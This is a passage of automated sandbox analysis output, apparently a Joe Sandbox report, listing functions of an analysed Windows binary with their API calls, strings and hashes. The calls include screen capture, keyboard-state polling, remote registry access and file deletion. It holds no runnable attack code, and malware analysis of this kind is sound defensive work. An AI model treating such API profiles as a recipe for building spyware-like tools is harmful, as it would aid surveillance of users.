                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 6842b352247ccab0e2be2583c1cf08f9810c5a6d34dddbd1fdbafe3c8a4368ed
                                              • Instruction ID: a8fce67dd3d5df9d6bc33c86cbf670bd6789280cacac99064442300027f39474
                                              • Opcode Fuzzy Hash: 6842b352247ccab0e2be2583c1cf08f9810c5a6d34dddbd1fdbafe3c8a4368ed
                                              • Instruction Fuzzy Hash: 57613B71900209EFDF10AF95DC45EAEBBB9FF08300F4481A9F915A72A0DB759A15CF60
                                              Function 00BA7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00BA7A79
                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BA7A85
                                              • CreateCompatibleDC.GDI32(?), ref: 00BA7A91
                                              • SelectObject.GDI32(00000000,?), ref: 00BA7A9E
                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BA7AF2
                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00BA7B2E
                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BA7B52
                                              • SelectObject.GDI32(00000006,?), ref: 00BA7B5A
                                              • DeleteObject.GDI32(?), ref: 00BA7B63
                                              • DeleteDC.GDI32(00000006), ref: 00BA7B6A
                                              • ReleaseDC.USER32(00000000,?), ref: 00BA7B75
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: 02ba219a32f1d6d428cc4fe9476e886200376270b0325deedd71b48acdcb2bae
                                              • Instruction ID: 8321a3b26f511a6145479dfd57e3c14b049f97e1ed1d99d7cb7fade3a780214a
                                              • Opcode Fuzzy Hash: 02ba219a32f1d6d428cc4fe9476e886200376270b0325deedd71b48acdcb2bae
                                              • Instruction Fuzzy Hash: F3514D71948309EFCB14DFA8CC85EAEBBF9EF49310F14845DF959A7250DB31A9418B60
                                              Function 00B9A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B9A4D4
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B9A4F6
                                              • __swprintf.LIBCMT ref: 00B9A54F
                                              • __swprintf.LIBCMT ref: 00B9A568
                                              • _wprintf.LIBCMT ref: 00B9A61E
                                              • _wprintf.LIBCMT ref: 00B9A63C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-2391861430
                                              • Opcode ID: 30d47455f343fcd968483fac9683c9982adf7c70ccc488819a667ce74e082e43
                                              • Instruction ID: 07d050dd64e3f8482358a455c5d78fe10ed1a705b84ff26ae155d9c209cdce76
                                              • Opcode Fuzzy Hash: 30d47455f343fcd968483fac9683c9982adf7c70ccc488819a667ce74e082e43
                                              • Instruction Fuzzy Hash: FC517C71D00109AACF15EBA4CD86EEEB7F8EF14340F1445E5F505A21A2DB316F98DBA1
                                              Function 00B99710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B9951A: __time64.LIBCMT ref: 00B99524
                                                • Part of subcall function 00B44A8C: _fseek.LIBCMT ref: 00B44AA4
                                              • __wsplitpath.LIBCMT ref: 00B997EF
                                                • Part of subcall function 00B5431E: __wsplitpath_helper.LIBCMT ref: 00B5435E
                                              • _wcscpy.LIBCMT ref: 00B99802
                                              • _wcscat.LIBCMT ref: 00B99815
                                              • __wsplitpath.LIBCMT ref: 00B9983A
                                              • _wcscat.LIBCMT ref: 00B99850
                                              • _wcscat.LIBCMT ref: 00B99863
                                                • Part of subcall function 00B99560: _memmove.LIBCMT ref: 00B99599
                                                • Part of subcall function 00B99560: _memmove.LIBCMT ref: 00B995A8
                                              • _wcscmp.LIBCMT ref: 00B997AA
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DE1
                                                • Part of subcall function 00B99CF1: _wcscmp.LIBCMT ref: 00B99DF4
                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B99A0D
                                              • _wcsncpy.LIBCMT ref: 00B99A80
                                              • DeleteFileW.KERNEL32(?,?), ref: 00B99AB6
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B99ACC
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B99ADD
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B99AEF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: 5c12b56047384dfb54e6f95d50b64cbe0fbd91b80af14d144791281f1bad83c1
                                              • Instruction ID: 2f3495682183060277bbdbcf1de06f5d0d48931b8ed56664a5570d82df072c5d
                                              • Opcode Fuzzy Hash: 5c12b56047384dfb54e6f95d50b64cbe0fbd91b80af14d144791281f1bad83c1
                                              • Instruction Fuzzy Hash: C4C12BB1900219AADF21DF99CC85ADEB7FDEF49314F0040EAF609E7151EB709A848F65
                                              Function 00B45BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B45BF1
                                              • GetMenuItemCount.USER32(00BF7890), ref: 00B80E7B
                                              • GetMenuItemCount.USER32(00BF7890), ref: 00B80F2B
                                              • GetCursorPos.USER32(?), ref: 00B80F6F
                                              • SetForegroundWindow.USER32(00000000), ref: 00B80F78
                                              • TrackPopupMenuEx.USER32(00BF7890,00000000,?,00000000,00000000,00000000), ref: 00B80F8B
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B80F97
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                              • String ID:
                                              • API String ID: 2751501086-0
                                              • Opcode ID: 53a55b267577b292882907c56042d3011d40db2aaae740609b3eb4a6b03e02ef
                                              • Instruction ID: 42100e1946f1489bce789923d585481b7f22136b3aa37a6bcd06411fbfe8bdb8
                                              • Opcode Fuzzy Hash: 53a55b267577b292882907c56042d3011d40db2aaae740609b3eb4a6b03e02ef
                                              • Instruction Fuzzy Hash: D471E430A54709BFEB70AB54CC85FAABFE5FF043A4F104296F924661E1CBB16854DB90
                                              Function 00B883FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              • _memset.LIBCMT ref: 00B88489
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B884BE
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B884DA
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B884F6
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B88520
                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B88548
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B88553
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B88558
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: f4c1b68151a6eb15034fd202600b926242b75dc8512a0f431e9f1dd5afba511b
                                              • Instruction ID: c366560ffed4f16e542fd956efcfef7bccb03025cf9068a3720f9e905b332bf1
                                              • Opcode Fuzzy Hash: f4c1b68151a6eb15034fd202600b926242b75dc8512a0f431e9f1dd5afba511b
                                              • Instruction Fuzzy Hash: 61410A72C1022DABCF11EBA8DC95DEEB7B8FF08340F4445A9E905A3261DB309E45DB90
                                              Function 00BB147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: c98d1816ad7f5174a4328d63f3c21f079f92c0b8849ba121caad68b4e4c9735e
                                              • Instruction ID: 070e8a549982e3d53983befca94819215fa0f850bb32509fcbfc37c24c6a4eb5
                                              • Opcode Fuzzy Hash: c98d1816ad7f5174a4328d63f3c21f079f92c0b8849ba121caad68b4e4c9735e
                                              • Instruction Fuzzy Hash: 9F413B7151025A8BCF10EF58D961AEA37B4FF61300FA048E5FC525B292DBB0EE5ACB51
                                              Function 00B95882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B4153B: _memmove.LIBCMT ref: 00B415C4
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B958EB
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B95901
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B95912
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B95924
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B95935
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 26d166834e3e54cbdd68398f2044098935b320874bd9afa376e4eec7acd41457
                                              • Instruction ID: 7fcea2a704e2c61e0a0cfc6b3c83169ca75a4248ef3a531ad8bd6b2ed3da04aa
                                              • Opcode Fuzzy Hash: 26d166834e3e54cbdd68398f2044098935b320874bd9afa376e4eec7acd41457
                                              • Instruction Fuzzy Hash: 4211863199016DB9DB20A7A6DC5ADFF7BFCEBD1B50F4008A9B401A20E1EF601E45C6A5
                                              Function 00B94C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: a6d9f6a68e9ac39b45a9d0adc17baa6dfddb677be50ef68edb0c4cfe547db46a
                                              • Instruction ID: 0292c56e8dc5d960e7378855f6f22855091819e9c4012c1be90378244c89f616
                                              • Opcode Fuzzy Hash: a6d9f6a68e9ac39b45a9d0adc17baa6dfddb677be50ef68edb0c4cfe547db46a
                                              • Instruction Fuzzy Hash: 54110232505208AFCB25BB649C4AFEB77FCDF45712F0441F6F405A2191EF7099868A60
                                              Function 00B95530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00B95535
                                                • Part of subcall function 00B50859: timeGetTime.WINMM(?,00000002,00B3C22C), ref: 00B5085D
                                              • Sleep.KERNEL32(0000000A), ref: 00B95561
                                              • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00B95585
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B955A7
                                              • SetActiveWindow.USER32 ref: 00B955C6
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B955D4
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B955F3
                                              • Sleep.KERNEL32(000000FA), ref: 00B955FE
                                              • IsWindow.USER32 ref: 00B9560A
                                              • EndDialog.USER32(00000000), ref: 00B9561B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: f30f052f8ba7d9ec1be14d25ef5b22acf37f2ca58ec3afb65213b1ee79c436a6
                                              • Instruction ID: 355c6cfd8a41c1a28bfe777d8456be416b370b630a445941515f28b28567304d
                                              • Opcode Fuzzy Hash: f30f052f8ba7d9ec1be14d25ef5b22acf37f2ca58ec3afb65213b1ee79c436a6
                                              • Instruction Fuzzy Hash: 95215E70244A04AFEF626F64EC89F363BAAEB68345F041079F50183271DF719D50DB61
                                              Function 00B9DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • CoInitialize.OLE32(00000000), ref: 00B9DC2D
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B9DCC0
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00B9DCD4
                                              • CoCreateInstance.OLE32(00BC3D4C,00000000,00000001,00BEB86C,?), ref: 00B9DD20
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B9DD8F
                                              • CoTaskMemFree.OLE32(?,?), ref: 00B9DDE7
                                              • _memset.LIBCMT ref: 00B9DE24
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00B9DE60
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B9DE83
                                              • CoTaskMemFree.OLE32(00000000), ref: 00B9DE8A
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B9DEC1
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00B9DEC3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: 8955aa05252f129db67f9bad163cf892f5dda21b190beb1ad687507c764324f4
                                              • Instruction ID: 66d5ee01ddb086dae8e51bf675765b6339585169692395175b54beb821bb9a83
                                              • Opcode Fuzzy Hash: 8955aa05252f129db67f9bad163cf892f5dda21b190beb1ad687507c764324f4
                                              • Instruction Fuzzy Hash: 28B1CC75A00109AFDB14EFA5C889DAEBBF9FF48304F1484A9E905EB261DB30ED45CB50
                                              Function 00B9081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00B90896
                                              • SetKeyboardState.USER32(?), ref: 00B90901
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00B90921
                                              • GetKeyState.USER32(000000A0), ref: 00B90938
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00B90967
                                              • GetKeyState.USER32(000000A1), ref: 00B90978
                                              • GetAsyncKeyState.USER32(00000011), ref: 00B909A4
                                              • GetKeyState.USER32(00000011), ref: 00B909B2
                                              • GetAsyncKeyState.USER32(00000012), ref: 00B909DB
                                              • GetKeyState.USER32(00000012), ref: 00B909E9
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00B90A12
                                              • GetKeyState.USER32(0000005B), ref: 00B90A20
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 6ae9ebd2bfc543e3d9a3a1aa3929013dfc4235cd8274e4c4e0a89b26e559aee4
                                              • Instruction ID: d721bcb3084efdff55d309e0db956c5055eaf8810d5be58d6583a91e875f3b35
                                              • Opcode Fuzzy Hash: 6ae9ebd2bfc543e3d9a3a1aa3929013dfc4235cd8274e4c4e0a89b26e559aee4
                                              • Instruction Fuzzy Hash: D851B820A187892DFF35FBB484517AABFF4DF11380F0885E995C2571C3DA649A4CCBA1
                                              Function 00B8CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00B8CE1C
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CE2E
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B8CE8C
                                              • GetDlgItem.USER32(?,00000002), ref: 00B8CE97
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CEA9
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B8CEFD
                                              • GetDlgItem.USER32(?,000003E9), ref: 00B8CF0B
                                              • GetWindowRect.USER32(00000000,?), ref: 00B8CF1C
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B8CF5F
                                              • GetDlgItem.USER32(?,000003EA), ref: 00B8CF6D
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B8CF8A
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B8CF97
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: 253a85ddad3b0fb1a13398891de018bc5122eccedf4922c5e08bd06f0e3a5b5b
                                              • Instruction ID: dda0a323f66425b8c8e9273c67ba75e956702fd607310f4ce3206394ef716200
                                              • Opcode Fuzzy Hash: 253a85ddad3b0fb1a13398891de018bc5122eccedf4922c5e08bd06f0e3a5b5b
                                              • Instruction Fuzzy Hash: 02516FB1B10205AFDB18DF68CD89EAEBBF6EB88311F148169F615D7290DB70AD04CB10
                                              Function 00B323F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B31F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B32412,?,00000000,?,?,?,?,00B31AA7,00000000,?), ref: 00B31F76
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B324AF
                                              • KillTimer.USER32(-00000001,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B3254A
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00B6BFE7
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C018
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C02F
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B31AA7,00000000,?,?,00B31EBE,?,?), ref: 00B6C04B
                                              • DeleteObject.GDI32(00000000), ref: 00B6C05D
                                              Memory Dump Source
